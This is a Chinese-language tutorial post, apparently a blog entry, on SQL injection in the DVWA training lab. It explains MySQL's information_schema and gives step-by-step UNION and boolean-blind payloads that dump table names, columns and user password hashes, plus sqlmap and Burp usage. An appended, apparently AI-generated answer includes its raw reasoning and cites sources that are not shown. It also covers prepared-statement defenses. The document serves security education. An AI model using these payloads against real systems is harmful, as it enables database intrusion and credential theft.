DVWA SQL Injection

本文详细介绍了SQL注入的概念,以及如何利用MySQL的information_schema数据库来获取数据库元数据。通过示例展示了如何检查SQL注入漏洞,以及如何利用注入获取数据库版本、用户权限、表信息和字段信息。同时,列举了可能的SQL注入攻击技巧,如union查询和闭合引号等。

记录SQL注入相关,供自己查看,MySQL5.0及以上版本提供了information_schema信息数据库,提供了访问数据库元数据的方式。

information_schema数据库表说明:

SCHEMATA表:提供了当前mysql实例中所有数据库的信息。是show databases的结果取之此表。

TABLES表:提供了关于数据库中的表的信息(包括视图)。详细表述了某个表属于哪个schema,表类型,表引擎,创建时间等信息。是show tables from schemaname的结果取之此表。

TABLES表字段:

Table_catalog数据表登记目录
Table_schema数据表所属的数据库名
Table_name表名称
Table_type表类型[system view|base table]
Engine使用的数据库引擎[MyISAM|CSV|InnoDB]
Version版本,默认值10
Row_format行格式[Compact|Dynamic|Fixed]
Table_rows表里所存多少行数据
Avg_row_length平均行长度
Data_length数据长度
Max_data_length最大数据长度
Index_length索引长度
Data_free空间碎片
Auto_increment做自增主键的自动增量当前值
Create_time表的创建时间
Update_time表的更新时间
Check_time表的检查时间
Table_collation表的字符校验编码集
Checksum校验和
Create_options创建选项
Table_comment表的注释、备注

COLUMNS表:提供了表中的列信息。详细表述了某张表的所有列以及每个列的信息。是show columns from schemaname.tablename的结果取之此表。

COLUMNS表字段:

TABLE_CATALOGnvarchar(128)表限定符
TABLE_SCHEMAnvarchar(128)数据库名
TABLE_NAMEnvarchar(128)表名
COLUMN_NAMEnvarchar(128)列名
ORDINAL_POSITIONsmallint列标识号
COLUMN_DEFAULTnvarchar(4000)列的默认值
IS_NULLABLEvarchar(3)列的为空性。如果列允许 NULL,那么该列返回 YES。否则,返回 NO
DATA_TYPEnvarchar(128)系统提供的数据类型
CHARACTER_MAXIMUM_LENGTHsmallint以字符为单位的最大长度,适于二进制数据、字符数据,或者文本和图像数据。否则,返回 NULL。有关更多信息,请参见数据类型
CHARACTER_OCTET_LENGTHsmallint以字节为单位的最大长度,适于二进制数据、字符数据,或者文本和图像数据。否则,返回 NULL
NUMERIC_PRECISIONtinyint近似数字数据、精确数字数据、整型数据或货币数据的精度。否则,返回 NULL
NUMERIC_PRECISION_RADIXsmallint近似数字数据、精确数字数据、整型数据或货币数据的精度基数。否则,返回 NULL
NUMERIC_SCALEtinyint近似数字数据、精确数字数据、整数数据或货币数据的小数位数。否则,返回 NULL
DATETIME_PRECISIONsmallintdatetime 及 SQL-92 interval 数据类型的子类型代码。对于其它数据类型,返回 NULL
CHARACTER_SET_CATALOGvarchar(6)如果列是字符数据或 text 数据类型,那么返回 master,指明字符集所在的数据库。否则,返回 NULL
CHARACTER_SET_SCHEMAvarchar(3)如果列是字符数据或 text 数据类型,那么返回 DBO,指明字符集的所有者名称。否则,返回 NULL
CHARACTER_SET_NAMEnvarchar(128)如果该列是字符数据或 text 数据类型,那么为字符集返回唯一的名称。否则,返回 NULL
COLLATION_CATALOGvarchar(6)如果列是字符数据或 text 数据类型,那么返回 master,指明在其中定义排序次序的数据库。否则此列为 NULL
COLLATION_SCHEMAvarchar(3)返回 DBO,为字符数据或 text 数据类型指明排序次序的所有者。否则,返回 NULL
COLLATION_NAMEnvarchar(128)如果列是字符数据或 text 数据类型,那么为排序次序返回唯一的名称。否则,返回 NULL
DOMAIN_CATALOGnvarchar(128)如果列是一种用户定义数据类型,那么该列是某个数据库名称,在该数据库名中创建了这种用户定义数据类型。否则,返回 NULL
DOMAIN_SCHEMAnvarchar(128)如果列是一种用户定义数据类型,那么该列是这种用户定义数据类型的创建者。否则,返回 NULL
DOMAIN_NAMEnvarchar(128)

如果列是一种用户定义数据类型,那么该列是这种用户定义数据类型的名称。否则,返回 NULL

STATISTICS表:提供了关于表索引的信息。是show index from schemaname.tablename的结果取之此表。

USER_PRIVILEGES(用户权限)表:给出了关于全程权限的信息。该信息源自mysql.user授权表。是非标准表。

SCHEMA_PRIVILEGES(方案权限)表:给出了关于方案(数据库)权限的信息。该信息来自mysql.db授权表。是非标准表。

TABLE_PRIVILEGES(表权限)表:给出了关于表权限的信息。该信息源自mysql.tables_priv授权表。是非标准表。

COLUMN_PRIVILEGES(列权限)表:给出了关于列权限的信息。该信息源自mysql.columns_priv授权表。是非标准表。

CHARACTER_SETS(字符集)表:提供了mysql实例可用字符集的信息。是SHOW CHARACTER SET结果集取之此表。


COLLATIONS表:提供了关于各字符集的对照信息。

COLLATION_CHARACTER_SET_APPLICABILITY表:指明了可用于校对的字符集。这些列等效于SHOW COLLATION的前两个显示字段。

TABLE_CONSTRAINTS表:描述了存在约束的表。以及表的约束类型。

KEY_COLUMN_USAGE表:描述了具有约束的键列。

ROUTINES表:提供了关于存储子程序(存储程序和函数)的信息。此时,ROUTINES表不包含自定义函数(UDF)。名为“mysql.proc name”的列指明了对应于INFORMATION_SCHEMA.ROUTINES表的mysql.proc表列。

VIEWS表:给出了关于数据库中的视图的信息。需要有show views权限,否则无法查看视图信息。

TRIGGERS表:提供了关于触发程序的信息。必须有super权限才能查看该表

若拥有数据库所有权限,通过以上两个表可以查询到数据库的所有数据库、数据表以及数据表字段信息。

检查是否存在SQL注入:

' or 1=1#

 单引号闭合的情况,或者换成双引号尝试

 尝试使用union查询,首先测试查询的字段数

' union select 1#

' union select 1,2#

得知查询字段为两个

获取数据库版本信息,用户,数据库

' union select version(),concat(user(),' ',database())#

已获取当前数据库,获取数据库中所有的数据表:

' union select table_name,NULL from information_schema.tables where table_schema = 'dvwa'#

已获得数据表,获取某个数据表中所有字段:

' union select column_name,1 from information_schema.columns where table_schema = 'dvwa' and table_name = 'users'#

 根据数据表的字段查询数据库内容:

' union select user,concat(password,'|',last_login) from users#

 获取其它的信息:

查询所有数据库以及对应的数据表:

' union select table_schema,group_concat(table_name) from information_schema.tables group by table_schema#

 查询所有数据表以及对应的字段:

' union select table_name,group_concat(column_name) from information_schema.columns group by table_name#

 

 

<think>我们正在讨论DVWA中的SQL注入攻击。根据用户提供的引用,特别是引用[1]和[2],我们知道DVWASQL注入关卡分为不同安全级别(LOW, MEDIUM, HIGH, IMPOSSIBLE),并且攻击方法包括UNION注入、ERROR注入(针对非盲注)以及BOOLEAN盲注(针对盲注)。同时,引用[3]和[4]提到了一些防御措施,比如限制查询结果数量(LIMIT 1)以及分离查询提交页面和结果页面来防御自动化工具(如sqlmap)。 用户要求了解DVWASQL注入攻击的步骤和原理详解。我们将按照以下结构进行回答: 1. SQL注入原理简介 2. DVWA SQL Injection(非盲注)攻击步骤(针对LOW, MEDIUM, HIGH级别) 3. DVWA SQL Injection (Blind)(盲注)攻击步骤(针对LOW, MEDIUM, HIGH级别) 4. 防御措施分析(IMPOSSIBLE级别) 注意:在描述攻击步骤时,我们将结合引用[2]中的示例(获取dvwa数据库的所有表名)以及其他常见的注入技术。 由于引用中提到了使用手工注入和sqlmap,但TIME注入耗时太久未采用,因此我们将重点放在UNION注入、ERROR注入和BOOLEAN盲注上。 开始回答:</think>### DVWA SQL注入攻击步骤与原理详解 DVWA(Damn Vulnerable Web Application)是一款专为安全测试设计的漏洞演练平台。以下针对其SQL注入漏洞(非盲注/盲注)的攻击步骤与原理进行详解,结合LOW、MEDIUM、HIGH安全级别的实践方法,并引用相关技术点[^1][^2][^3][^4]。 --- #### **一、SQL注入原理** **核心漏洞**:攻击者通过篡改输入参数,破坏原始SQL语句结构,执行恶意查询。 **数学表达**: 设原始查询为: $$Q = \text{SELECT * FROM users WHERE id = } \color{red}{\text{'$input'}}$$ 当输入为 `1' UNION SELECT 1,table_name FROM information_schema.tables#` 时,实际执行语句变为: $$Q_{\text{malicious}} = \text{SELECT * FROM users WHERE id = '1' UNION SELECT 1,table_name FROM information_schema.tables#'}$$ 导致数据库返回敏感信息(如表名、字段值)。 --- #### **二、非盲注攻击步骤(SQL Injection)** 适用于页面直接返回查询结果的场景。 ##### **1. LOW级别** **漏洞点**:未过滤用户输入,直接拼接SQL语句[^1]。 **攻击步骤**: 1. **探测列数**(UNION注入前提): ```sql 1' ORDER BY 3# -- 尝试列数,直到报错(如ORDER BY 4报错则列数为3) ``` 2. **联合查询获取数据**(引用[2]示例): ```sql 1' UNION SELECT 1,table_name FROM information_schema.tables WHERE table_schema='dvwa'# ``` - `1` 为占位符,匹配原始查询列数 - `information_schema.tables` 为系统表,存储所有表名 - `table_schema='dvwa'` 限定目标数据库 ##### **2. MEDIUM级别** **漏洞点**:输入参数改为数字型(无引号),但未过滤[^3]。 **攻击步骤**: 1. **绕过数字型检测**: ```sql 1 UNION SELECT 1,GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema='dvwa'# ``` - 无需闭合引号,直接拼接UNION ##### **3. HIGH级别** **漏洞点**:分离查询与结果页面(防自动化工具),但未过滤输入[^4]。 **攻击步骤**: 1. **利用Burp Suite绕过页面分离**: - 拦截查询请求 → 修改参数为注入语句 → 转发获取响应 ```sql 1' UNION SELECT user,password FROM users# ``` - 通过结果页面查看敏感数据(如密码哈希值) --- #### **三、盲注攻击步骤(SQL Injection Blind)** 适用于页面无直接数据返回,但可通过布尔或时间差异判断结果。 ##### **1. BOOLEAN盲注(常用)** **原理**:根据页面返回内容差异(真/假)推断数据。 **攻击步骤**(以获取数据库名为例): 1. **判断数据库名长度**: ```sql 1' AND LENGTH(DATABASE())=4# -- 若页面返回正常,则库名长度为4 ``` 2. **逐字符猜解**: ```sql 1' AND SUBSTRING(DATABASE(),1,1)='d'# -- 验证首字母是否为'd' ``` - 使用 `SUBSTRING()` 或 `MID()` 函数截取字符 ##### **2. sqlmap自动化利用** **适用场景**:手工注入效率低时(如MEDIUM/HIGH级别)。 **命令示例**: ```bash sqlmap -u "http://dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" \ --cookie="PHPSESSID=xxx; security=medium" \ --batch --dbs ``` - `--dbs`:列举所有数据库 - `--tables -D dvwa`:列举dvwa库的所有表 > **注意**:HIGH级别因页面分离需配合Burp抓包(`--proxy=http://127.0.0.1:8080`)[^4]。 --- #### **四、防御机制分析(IMPOSSIBLE级别)** **安全代码原理**: 1. **预处理语句(Prepared Statements)**: ```php $stmt = $pdo->prepare("SELECT * FROM users WHERE id = :id"); $stmt->bindParam(':id', $id, PDO::PARAM_INT); // 强制类型为整数 ``` - 输入参数与SQL逻辑分离,杜绝拼接 2. **Token验证**: - 每次提交需携带CSRF Token,阻止自动化工具重放攻击[^3] --- ### 总结 | 安全级别 | 注入方式 | 关键技巧 | |----------|-------------------|-----------------------------------| | LOW | UNION/ERROR注入 | 闭合单引号,联合查询系统表[^2] | | MEDIUM | 数字型UNION注入 | 省去引号,直接UNION | | HIGH | 工具绕过+手工注入 | Burp Suite拦截修改请求[^4] | | IMPOSSIBLE | 防御生效 | 预处理语句+Token验证 | > 实践提示: > - 非盲注优先用UNION查询(高效) > - 盲注推荐BOOLEAN注入(避免耗时TIME注入)[^1] > - 遇到页面分离时,手动工具结合(Burp+sqlmap)
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值